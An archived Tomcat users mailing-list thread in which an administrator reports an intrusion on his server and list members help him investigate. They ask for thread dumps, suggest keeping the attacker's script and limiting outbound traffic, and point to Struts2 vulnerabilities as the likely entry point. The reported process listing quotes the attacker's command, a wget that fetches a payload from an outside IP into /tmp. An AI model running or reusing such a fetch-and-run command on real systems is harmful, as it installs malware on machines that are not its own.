klyG/1SE6TP9hAKFGQs3pQE+oAHZHMbJMlM/2cLwZXfFu2hPDBkrnk56YLC6SSSK a8Fgdwdo81CkhxGxd5aaFOfHqru9hFZIHsVqHmhFL5hJ6H84a7cL/prOPHu7k2rz /V2lPhNpr08bYy+s2pkN =4tjy -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, On 5/5/14, 11:12 AM, Leonardo Santagostini wrote: Ok, again its uploaded. This is the link https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing 1/2 GiB log file? Hrm. It doesn't even have any calls to Runtime.exec in it. If you have a snapshot of a thread dump (and only the thread dump, I don't need 3 weeks of your logs) that you took while the intrusion was taking place, post that. If you don't, then I think you're out of luck. Sounds like a bad time to go on holiday. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTZ7cEAAoJEBzwKT+lPKRYg0cP/1KH8lflN/Gdt8KJPJsOvmrs Jqok5NA6CsYZhI9AjxiCzK54O+HRrv8qpy9oyk1l4yCv7ims3Zd6PI6YmMmMjYbO TQiJ0ufWNI4mGj9WesHWPtFsSRsKfkhISXfKhdi3jO4p+uH03SkFivGMrKzRqkX/ IKVRV6lh2we3RFY/D/Vb0ptC/lSoy04tSI1H9IYJARI0DDh2tbVtJI1GvTp+qFch mm4/FTEh6a8XrE09EUvfyeFZKx5anEw0ybo0tU3TQHY76yOKHdP+ySjYBVGbjOx3 Ma38x1OqWBhwlfBlQbbHWl+QHbC7WhR4KHo+Aif+gQIF+DDgMURaRkJZepSzCUCt az6CKVllIErzN5eimwJxRYGFTDCn/3aRw/0Pvy7WIuReiqhaJh16PdUJCXAX8w/m Vxf+3rCziAgcTlVHJzDepQVnSOG5XYWpVNTdTwMwrKw1dWIQC9Iya8gK8R2Ynzpt kzeANOyhJE9fsmVpTxv5mx4CJuai/jF66BI92oBRnVOqr5sfAhzpstR59Njzw0H8 tHPF/XfhII1AEeLJpCiFw7PgO/zLtu6R0Z6mXnuC3vNJ0HesWaumRhqzPy9of+m/ 0FBZ5rMdPOrMY9vtnCUjTOzRWxlm0qQHI7g1UqmawtRZNuv47rkTPD92MubzAlSB EcwrNcX2iZ+JXXtSTnzH =nxGK -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
Hello Chris, but this logfile was only one day.
Maybe i had a concept mismatch trying to capture the exact moment when the
execution begins.
My command was
while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v
127.0.0.1 | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea | grep
java | grep -v grep | awk '{ print $2 }'); echo -e Se encontro wget
corriendo, sacando dump de JVM... ; kill -3 $PIDJAVA; fi; sleep 3; done
Maybe too many dumps all togheter, now im trying to get a live capture
without luck =(
If you know a better method, please letme know it.
Thanks for your effort, knid regards,
Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-05-05 13:06 GMT-03:00 Christopher Schultz ch...@christopherschultz.net
:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
Leonardo,
On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
Ok, again its uploaded.
This is the link
https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
1/2
GiB log file? Hrm.
It doesn't even have any calls to Runtime.exec in it. If you have a
snapshot of a thread dump (and only the thread dump, I don't need 3
weeks of your logs) that you took while the intrusion was taking
place, post that.
If you don't, then I think you're out of luck.
Sounds like a bad time to go on holiday.
- -chris
-BEGIN PGP SIGNATURE-
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iQIcBAEBCAAGBQJTZ7cEAAoJEBzwKT+lPKRYg0cP/1KH8lflN/Gdt8KJPJsOvmrs
Jqok5NA6CsYZhI9AjxiCzK54O+HRrv8qpy9oyk1l4yCv7ims3Zd6PI6YmMmMjYbO
TQiJ0ufWNI4mGj9WesHWPtFsSRsKfkhISXfKhdi3jO4p+uH03SkFivGMrKzRqkX/
IKVRV6lh2we3RFY/D/Vb0ptC/lSoy04tSI1H9IYJARI0DDh2tbVtJI1GvTp+qFch
mm4/FTEh6a8XrE09EUvfyeFZKx5anEw0ybo0tU3TQHY76yOKHdP+ySjYBVGbjOx3
Ma38x1OqWBhwlfBlQbbHWl+QHbC7WhR4KHo+Aif+gQIF+DDgMURaRkJZepSzCUCt
az6CKVllIErzN5eimwJxRYGFTDCn/3aRw/0Pvy7WIuReiqhaJh16PdUJCXAX8w/m
Vxf+3rCziAgcTlVHJzDepQVnSOG5XYWpVNTdTwMwrKw1dWIQC9Iya8gK8R2Ynzpt
kzeANOyhJE9fsmVpTxv5mx4CJuai/jF66BI92oBRnVOqr5sfAhzpstR59Njzw0H8
tHPF/XfhII1AEeLJpCiFw7PgO/zLtu6R0Z6mXnuC3vNJ0HesWaumRhqzPy9of+m/
0FBZ5rMdPOrMY9vtnCUjTOzRWxlm0qQHI7g1UqmawtRZNuv47rkTPD92MubzAlSB
EcwrNcX2iZ+JXXtSTnzH
=nxGK
-END PGP SIGNATURE-
-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Regarding i think an intrusion
Subject: Re: Regarding i think an intrusion
From: lsantagost...@gmail.com
To: users@tomcat.apache.org
Hello Chris, but this logfile was only one day.
MGAy Caramba!
Maybe i had a concept mismatch trying to capture the exact moment when the
execution begins.
My command was
while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v
127.0.0.1 | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea | grep
java | grep -v grep | awk '{ print $2 }'); echo -e Se encontro wget
corriendo, sacando dump de JVM... ; kill -3 $PIDJAVA; fi; sleep 3; done
Maybe too many dumps all togheter, now im trying to get a live capture
without luck =(
If you know a better method, please letme know it.
Thanks for your effort, knid regards,
Leonardo
Saludos.-
Leonardo Santagostini
MGTomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita utilizar JDK
@ 1.7 (ahora)
MGesto
ContainerBackgroundProcessor[StandardEngine[Catalina]] daemon prio=10
tid=0x52867800 nid=0x2550 waiting on condition [0x4105e000]
java.lang.Thread.State: TIMED_WAITING (sleeping)
at java.lang.Thread.sleep(Native Method)
at
org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
at java.lang.Thread.run(Thread.java:662)
MGEstos registros informativos producen MUCHO ruido
MGlog4j.properties
MGlog4j.logger.org.quartz=OFF //(Callate Quartz)
MGeso
ajp-bio-8009-exec-37 daemon prio=10 tid=0x2aaac07fd800 nid=0x2656
runnable [0x46f34000]
java.lang.Thread.State: RUNNABLE
at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern
Re: Regarding i think an intrusion
2014-04-30 19:07 GMT+02:00 Christopher Schultz ch...@christopherschultz.net : -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: Im uploading mi logfiles so it will be available when finished uploading. Remember to get a thread dump while Runtime.exec() is running. You should copy the script /tmp/4.sh somewhere else so you have a copy in case the attacker tries to clean-up after themselves. That's certainly what's doing the evil work. You could probably set up iptables or something to restrict outgoing requests so that the attack can't progress across your network. Regarding the configuration, its working in two other sites without problem, and there is no problem putting L4 balancing with haproxy. I have asked developers about that exploit, still without answer. You appear to be using struts2 2.1.8, which is in the range of versions vulnerable to this bug. There is a workaround that you can probably apply: http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last section on this page). Of course, the vulnerability doesn't allow you to simply inject code or anything like that: you can certainly mess-around with code that is already available on the site, though. I think the S2-021 can be used to inject code. There is a POC circulating proving it. That said, this struts version (2.1.8) is also vulnerable to http://struts.apache.org/release/2.3.x/docs/s2-016.html which permits code execution very easily. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTYS3BAAoJEBzwKT+lPKRYqDsP/jmNjM+YwxySFGgPUuvcL2bN kkApblcr9ryGZQG6RGwUFr69FCJ8qFDQSZ0aXXxPCfTpM6ce1VqXPv+WcOwnueOF mrugSa2InF2IWPAP2lwhEGqyxRAYZGfxz0aA9sFb7sSw4IpDP7u6TJx9g3oYrLTt URIbzTfhY0aGgEkQlrWNgrAWFKsUQ0uOrg8+3IS52O/e1ZVdudTMQBh5/LLJ522p yr+TlMooKDY8OA1TYttE0zEe3/Z9dd2AZ4YHoqLy8Hwq0lufYSaFZ5TpHfiOgJ0I 0Q3dcXEmjMTrBkBm4JKBR9b6KZSvG/H42q0GsEFHZeGw+3VIqYFGVRR5iCRRvVgg cqVKgGevB+fefcbGX9IFgFnus8QMUYq4XOcsE1YJVflxVBEfgwsCDLZEJqpzbovV ZpNBimPoLc8I5ifo2o7GSkO1GNSjhD7Q9p5MnmNW7Qna9RJh67Lv2oft9yPqGvjZ F2dTgbKFqyr8GSy/X4Ji8FsoeK+YxF0zXXDkaXxJzu054LuhodLCHJu7WwnwGjjL 0VI/Xxfihzk9+u3HNuwK0HTEt40Tca+vEKDUlMa9fvHL3ZqM3upy50bGE0PCTrJO A1cI+e0lzKEEQ+maym65DmSYiVvUPnfv0AxA0iUfU/UbhV1yWEkD3TyF3dOZPZqH ob6Km1Clt4KNLKVyQjt+ =8KFm -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cédric, On 5/1/14, 10:00 AM, Cédric Couralet wrote: 2014-04-30 19:07 GMT+02:00 Christopher Schultz ch...@christopherschultz.net : Leonardo, On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: Im uploading mi logfiles so it will be available when finished uploading. Remember to get a thread dump while Runtime.exec() is running. You should copy the script /tmp/4.sh somewhere else so you have a copy in case the attacker tries to clean-up after themselves. That's certainly what's doing the evil work. You could probably set up iptables or something to restrict outgoing requests so that the attack can't progress across your network. Regarding the configuration, its working in two other sites without problem, and there is no problem putting L4 balancing with haproxy. I have asked developers about that exploit, still without answer. You appear to be using struts2 2.1.8, which is in the range of versions vulnerable to this bug. There is a workaround that you can probably apply: http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last section on this page). Of course, the vulnerability doesn't allow you to simply inject code or anything like that: you can certainly mess-around with code that is already available on the site, though. I think the S2-021 can be used to inject code. There is a POC circulating proving it. That said, this struts version (2.1.8) is also vulnerable to http://struts.apache.org/release/2.3.x/docs/s2-016.html which permits code execution very easily. Ouch. Yeah, there's always that ;) - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTYsE7AAoJEBzwKT+lPKRYwqUP/1E6TUIJq618bPN0KzzvQbC4 Hny9racWUoNKFayWa9Xz/uWbQvXADyPnjO9q1BhcZW4TMyBTTksSUo33JAy567Sn tspV1ldMdOcL+y7KQUNJb9VJI9CV5h2nkeoaZacm8qmg9fZUqTihhz+qRC/U9JMa iJGKlLYIjvzPFrTXsoFnGl9yT54JAXvDf8aJPiSimD1Mu78KXCRhhterIH5QscI1 qstciSIllaSeq6EccM7b9hH4tEEXT/PwjiEoV1zSzxP01XT1qPnxtyRtNhWxer2p MDzDEimTNVshy9ilXa3MTBZh9hLcp3uEsUqmgSQyLAeLEKEEqQcsOkpQHfn9JOQQ ZXJVvhM1PuM4YsMoRcenu5Otdc5AUPh31b614Mc1NBtFRj/DVARWCU1u0Rb+mTTW HsNeRhmTfGp09x2NCokW2ncMV+coytjUwbfPGZ2yQAIZCC8k9EAxI942cKzsBVdU J7Ch3J9EEy0WxEiX8zDrHjNWWwmRBf0BexEQqnnCgQCMWAoVjRcPo75LChY60uDP vvB5Z/iGtbfFSwKEPVvYJhDzMJm3tlxVVdhmT+nejig6S4vdhAY/yDIxnNUm7waE IEJ7xtN5Ev3XLxT1fR34kw3n+0aRXiWyZzMTr2gTyf6C/Y9moz0wPyliBz0qKh67 hEEF98sa1D+pfJC5FGdj =ZJPK -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
Konstantin,
On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
lsantagost...@gmail.com:
Hello Dan,
Nop, the attacker is executing locally the following
tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh
tomcat8893 8882 0 Apr27 ?00:00:00 wget
http://218.199.102.59/.xy/squid32 -O /tmp/squid
And the launch squid who tries to connect via ssh to varoius
places.
Right now its time to leave the office, but in a few hours i will
paste in pastebin access logs, config files, wherever you tell
me.
This is my pstree
[root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
├─java─┬─sh───wget │ └─263*[{java}]
sh launched by tomcat's java?
Yes: please verify that it's the JVM running Tomcat, and not just any
JVM process.
Take a thread dump:
https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
It shall show what is stacktrace in thread that launched external
process.
+1
The only things that ship with Tomcat that call Process.exec() are the
CGI servlet and SSI, both of which are disabled by default. So, either
you have an insecure CGI/SSI configuration, your web application has a
vulnerability, or you have deployed something like the Manager
application and improperly-secured it.
A classic example of such an intrusion might be that someone got a
foothold elsewhere into your network, and the Manager web application
is not properly secured with a password, etc.
- -chris
-BEGIN PGP SIGNATURE-
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
+qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr
BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS
ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj
UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb
TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W
WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7
87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12
lvJcfOhzHLwo07Pv+y3J
=EiX9
-END PGP SIGNATURE-
-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
Ok, i will do the following:
1) thread dump of running tomcat instance
2) Pastebin the running tomcat config
I think at mid day will have all the info.
Thanks all for replying me and all the responses.
Regards, Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-04-30 10:55 GMT-03:00 Christopher Schultz ch...@christopherschultz.net
:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
Konstantin,
On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
lsantagost...@gmail.com:
Hello Dan,
Nop, the attacker is executing locally the following
tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh
tomcat8893 8882 0 Apr27 ?00:00:00 wget
http://218.199.102.59/.xy/squid32 -O /tmp/squid
And the launch squid who tries to connect via ssh to varoius
places.
Right now its time to leave the office, but in a few hours i will
paste in pastebin access logs, config files, wherever you tell
me.
This is my pstree
[root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
├─java─┬─sh───wget │ └─263*[{java}]
sh launched by tomcat's java?
Yes: please verify that it's the JVM running Tomcat, and not just any
JVM process.
Take a thread dump:
https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
It shall show what is stacktrace in thread that launched external
process.
+1
The only things that ship with Tomcat that call Process.exec() are the
CGI servlet and SSI, both of which are disabled by default. So, either
you have an insecure CGI/SSI configuration, your web application has a
vulnerability, or you have deployed something like the Manager
application and improperly-secured it.
A classic example of such an intrusion might be that someone got a
foothold elsewhere into your network, and the Manager web application
is not properly secured with a password, etc.
- -chris
-BEGIN PGP SIGNATURE-
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
+qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr
BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS
ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj
UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb
TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W
WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7
87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12
lvJcfOhzHLwo07Pv+y3J
=EiX9
-END PGP SIGNATURE-
-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
Hello list,
well my homework is done
Here are the links:
setenv.sh: http://pastebin.com/EN1mXDFi
catalina.sh: http://pastebin.com/1vRVLbSm
web.xml: http://pastebin.com/BqEfiXXm
server.xml: http://pastebin.com/wfzE8bYU
logging.properties: http://pastebin.com/Qurk8sLU
catalina.properties: http://pastebin.com/jkfY1ZRQ
tree + logsfiles: http://pastebin.com/j3tip4ij
Note that logsfiles, are not the logfiles itsef but only a ls -lah (just
for you to see the logsizes)
A little more about the infraestructure i've mounted ill do some ascii art.
internet --- FW --nat--Haproxy (1)--Apache(2)-- mod_jk
(3)--Haproxy(4)-- Tomcat7(5) -- haproxy(6) --Tomcat(7)
Apache(2) is serving static content so haproxy(1) at the first level does
http round robin balancing
Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection)
using mod_jk(3)
Tomcat(5) are the main app server (the ones gets intruded) who uses
tomcat(7) (solr service) using haproxy(6) using L4 connection.
Versions:
Apache: 2.2.17
mod_jk: 1.2.31
haproxy: 1.4.22
Tomcat: 7.0.53
Java: 1.6.0.41
[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
java version 1.6.0_41
Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
OS: CentOS 5.8 64 bit
[root@arcbaappvrt05 tomcat]# uname -a
Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21
20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
CentOS release 5.8 (Final)
[root@arcbaappvrt05 tomcat]#
For now i havent see that the squid process whas launched so i couldnt do a
dump
Letme know if you need more information.
BTW, pastebin links will work for one week.
Kind regards, yours
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-04-30 11:09 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com:
Ok, i will do the following:
1) thread dump of running tomcat instance
2) Pastebin the running tomcat config
I think at mid day will have all the info.
Thanks all for replying me and all the responses.
Regards, Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-04-30 10:55 GMT-03:00 Christopher Schultz
ch...@christopherschultz.net:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
Konstantin,
On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
lsantagost...@gmail.com:
Hello Dan,
Nop, the attacker is executing locally the following
tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh
tomcat8893 8882 0 Apr27 ?00:00:00 wget
http://218.199.102.59/.xy/squid32 -O /tmp/squid
And the launch squid who tries to connect via ssh to varoius
places.
Right now its time to leave the office, but in a few hours i will
paste in pastebin access logs, config files, wherever you tell
me.
This is my pstree
[root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
├─java─┬─sh───wget │ └─263*[{java}]
sh launched by tomcat's java?
Yes: please verify that it's the JVM running Tomcat, and not just any
JVM process.
Take a thread dump:
https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
It shall show what is stacktrace in thread that launched external
process.
+1
The only things that ship with Tomcat that call Process.exec() are the
CGI servlet and SSI, both of which are disabled by default. So, either
you have an insecure CGI/SSI configuration, your web application has a
vulnerability, or you have deployed something like the Manager
application and improperly-secured it.
A classic example of such an intrusion might be that someone got a
foothold elsewhere into your network, and the Manager web application
is not properly secured with a password, etc.
- -chris
-BEGIN PGP SIGNATURE-
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
+qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr
BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS
ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj
UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb
TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W
WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7
87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12
lvJcfOhzHLwo07Pv+y3J
=EiX9
-END PGP SIGNATURE-
-
To unsubscribe, e-mail:
Re: Regarding i think an intrusion
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
Leonardo,
You need to post a thread dump as well.
- -chris
On 4/30/14, 11:35 AM, Leonardo Santagostini wrote:
Hello list,
well my homework is done
Here are the links:
setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh:
http://pastebin.com/1vRVLbSm web.xml: http://pastebin.com/BqEfiXXm
server.xml: http://pastebin.com/wfzE8bYU logging.properties:
http://pastebin.com/Qurk8sLU catalina.properties:
http://pastebin.com/jkfY1ZRQ tree + logsfiles:
http://pastebin.com/j3tip4ij
Note that logsfiles, are not the logfiles itsef but only a ls -lah
(just for you to see the logsizes)
A little more about the infraestructure i've mounted ill do some
ascii art.
internet --- FW --nat--Haproxy (1)--Apache(2)-- mod_jk
(3)--Haproxy(4)-- Tomcat7(5) -- haproxy(6) --Tomcat(7)
Apache(2) is serving static content so haproxy(1) at the first
level does http round robin balancing Apache(2) connects to
tomcat(5) through haproxy(4) (using L4 connection) using mod_jk(3)
Tomcat(5) are the main app server (the ones gets intruded) who
uses tomcat(7) (solr service) using haproxy(6) using L4
connection.
Versions:
Apache: 2.2.17 mod_jk: 1.2.31 haproxy: 1.4.22 Tomcat: 7.0.53 Java:
1.6.0.41
[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
java version 1.6.0_41 Java(TM) SE Runtime Environment (build
1.6.0_41-b02) Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01,
mixed mode)
OS: CentOS 5.8 64 bit
[root@arcbaappvrt05 tomcat]# uname -a Linux
arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb
21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
